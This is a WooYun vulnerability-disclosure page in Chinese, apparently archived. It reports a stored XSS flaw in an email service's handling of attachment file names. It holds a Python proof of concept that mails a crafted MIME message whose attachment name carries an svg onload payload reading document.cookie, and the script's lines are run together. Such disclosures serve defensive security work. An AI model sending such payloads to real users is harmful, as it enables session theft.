乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-22: 细节已通知厂商并且等待厂商处理中 2014-06-26: 厂商已经确认,细节仅向厂商公开 2014-06-29: 细节向第三方安全合作伙伴开放 2014-08-20: 细节向核心白帽子及相关领域专家公开 2014-08-30: 细节向普通白帽子公开 2014-09-09: 细节向实习白帽子公开 2014-09-20: 细节向公众公开
又一处
附件文件名处未过滤,可触发XSS假设攻击者为[email protected],受害者为[email protected]
import smtplibimport base64sender = '[email protected]'reciever = '[email protected]'message = """From: <test> <[email protected]>To: <test> <[email protected]>Subject: TestMIME-Version: 1.0Content-Type: multipart/mixed; boundary=\"YOUAREUNDERATTACK\"--YOUAREUNDERATTACKContent-Type: multipart/alternative; boundary=\"YOUAREUNDERATTACK\"--YOUAREUNDERATTACKContent-Type: text/plain; charset=GBKContent-Transfer-Encoding: base64IFlvdSBhcmUgdW5kZXIgYXR0YWNrLgoKCg==--YOUAREUNDERATTACKContent-Type: text/html; charset=GBKContent-Transfer-Encoding: base64PGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6MS43O2NvbG9yOiMwMDAwMDA7Zm9udC1zaXplOjE0cHg7Zm9udC1mYW1pbHk6YXJpYWwiPjxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OjEuNztjb2xvcjojMDAwMDAwO2ZvbnQtc2l6ZToxNHB4O2ZvbnQtZmFtaWx5OmFyaWFsIj4mbmJzcDtZb3UgYXJlIHVuZGVyIGF0dGFjay48L2Rpdj48YnI+PGJyPjxzcGFuIHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBpZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9zcGFuPjwvc3Bhbj48L2Rpdj48YnI+PGJyPjxzcGFuIHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBpZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9zcGFuPjwvc3Bhbj4=--YOUAREUNDERATTACK----YOUAREUNDERATTACKContent-Type: text/plain; name=\"filename.txt<svg onload=alert(document.cookie)>\"Content-Transfer-Encoding: base64Content-Disposition: attachment; filename=\"filename.txt<svg onload=alert(document.cookie)>\"Q29kZSBpcyBwb2V0cnku--YOUAREUNDERATTACK--"""try: smtpObj = smtplib.SMTP('smtp.attack.com') smtpObj.login('attack','password') smtpObj.sendmail(sender, reciever, message) print "Successfully sent email"except Exception: print "Error: unable to send email"
过滤
危害等级:中
漏洞Rank:10
确认时间:2014-06-26 22:01
暂无